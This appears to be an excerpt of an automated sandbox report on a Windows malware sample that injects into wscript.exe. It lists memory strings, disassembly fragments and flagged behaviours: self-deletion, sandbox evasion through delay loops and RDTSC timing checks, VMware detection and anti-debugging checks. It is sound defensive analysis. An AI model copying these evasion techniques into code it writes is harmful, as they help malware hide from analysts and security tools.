Source: UaTmOE6yP9.exe, 00000000.00000000.341534610.00000000008E2000.00000020.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
Source: UaTmOE6yP9.exe, 00000003.00000000.345884716.00000000008E2000.00000020.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: wscript.exe, 00000009.00000002.611779827.0000000005737000.00000004.00020000.sdmp	String found in binary or memory: dotNetProtector
Source: wscript.exe, 00000009.00000002.611779827.0000000005737000.00000004.00020000.sdmp	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*
Source: UaTmOE6yP9.exe	String found in binary or memory: dotNetProtector
Source: UaTmOE6yP9.exe	String found in binary or memory: qOrset_ShowInTaskbarFUseTwoDigitYearAltDirectorySeparatorChartmFirstCharM_firstCharTryParseHexCharStringToNumberStreamHeaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderBinderTypeDefFinder_encoderlpBufferResourceManagerSet_LoggerDebuggerMakeQuantifierListenerOwnOwnerCreateProcessAsUserFetchReturnParameterm_returnParameterMDTableWriterget_IsPointerBitConverterOtherLetterGetTokenForInternalErrorResourceManagerMediatoramDesignatorsDecimalSeparatorIEnumeratorGetEnumerator.ctor_subtractor.cctordotNetProtectorget_IsConstructorFrameSecurityDescriptorCreateDecryptorIntPtrGet_ErasEnumTypeSpecsEnumMethodSemanticsGetCharacteristicsSystem.DiagnosticsAddMilliseconds_dynamicMethodsGetMethodsAllowBracesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesIsRTLResourcesplfrrokpkd.resourcesRejectChangesGet_MethodBodiesMDBeginWriteMethodBodiesEnumerateFileSystemEntriesVTablesEnableVisualStylesAbbreviatedEnglishEraNamesLoadCulturesFromNamesGetEnumNamesSet_DayNamesHasSpacesInDayNamesGetNumberOfFramesShortTimesGet_s_systemTimeZonesCorLibTypesGetExceptionTypesMethodAttributesFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesProjectWinMDRefsM_stateFlagsBindingFlagsHijriMonthsLengthFlagsGetMethodImplementationFlagsSetImplementationFlagsModuleSearchPathsDateToTicksLiteralsEqualsAllStreamsSystem.Windows.FormsLevelConversionsGet_PointerToRelocationsm_methodInstantiationsSystem.CollectionsFunctionsCallingConventionsSet_OptionsTimeZoneInfoOptionsSigComparerOptionsGetAssertionsMethodImplInfosCalendarsget_CharsNumberOfLinenumbersGet_StreamHeadersGetOptionalCustomModifiersGetParametersAssertFiltersget_IsClassNoAccessAssemblyBuilderAccesshProcessGetCurrentProcesslpBaseAddressConvertRTInternalAddresslpAddressGet_WatsonBucketsCreateWindowsConcatM_bFormatIncludeSectCreateCaObjectGet_IsRequireSecObjectTaggedObjectStreamedObjectTypeObjectGetObjectobjectSelectFrameworkRedirectflProtectM_objSetM_normalPermSetCharSetNotECMADigitSetM_tryEndOffsetBaseFileOffsetFirstLevelOffsetSetStartOffsetMaxOptionShiftUnmanaged32Bit_64Bitop_ExplicitSystem.Reflection.Emit_ExitSetCompatibleTextRenderingDefaultFirstOrDefaultIAsyncResultresultOp_IncrementEnvironmentIsAllSecurityTransparentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentCheckRemoteDebuggerPresentIsDebuggerPresentGet_CurrExcStackCountM_labelCount_invocationCountReuseSlotGet_IsNewSlotParameterizedThreadStartConvertFailFastContiguousRidListDataHeaderListCopyToArrayListTttWaitTimeoutSuspendLayoutResumeLayoutMoveNextSystem.TextSet_SynchronizationContextcontext*

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_00915064 push ebp; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 0_2_01792877 push ebx; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B822 push eax; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B82B push eax; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041502F push esp; iretd
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B88C push eax; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416092 push ebx; retf
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416099 push ss; iretd
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_004160BB push ss; iretd
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00416105 push ss; iretd
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00415CE7 push ss; iretd
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00418556 push eax; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00414EEC push 395C2345h; retf
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00414F42 push ebp; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_0041B7D5 push eax; ret
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Code function: 3_2_00915064 push ebp; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0527D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6099 push ss; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6092 push ebx; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB88C push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD60BB push ss; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD502F push esp; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB82B push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB822 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD6105 push ss; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD5CE7 push ss; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD8556 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD4EEC push 395C2345h; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DDB7D5 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00DD4F42 push ebp; ret

Source: UaTmOE6yP9.exe

Static PE information: real checksum: 0x5063c should be: 0x10803c

Source: initial sample

Static PE information: section name: .text entropy: 7.77367738512

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Section loaded: OutputDebugStringW count: 229

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000DC8604 second address: 0000000000DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000DC899E second address: 0000000000DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe TID: 6588	Thread sleep time: -214000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4768	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 6632	Thread sleep time: -34000s >= -30000s

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Process information queried: ProcessInformation

Source: explorer.exe, 00000005.00000000.385097826.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.384921628.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.370237561.000000000461E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.356293831.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.384921628.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.356293831.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.385697655.000000000866E000.00000004.00000001.sdmp	Binary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: explorer.exe, 00000005.00000000.361282017.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.401542053.0000000008552000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000005.00000000.361282017.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.385097826.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.391155069.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 0_2_0179CA94 CheckRemoteDebuggerPresent,

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe

Code function: 3_2_004088D0 rdtsc

Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05244120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052AA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05263D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05247D50 mov eax, dword ptr fs:[00000030h]
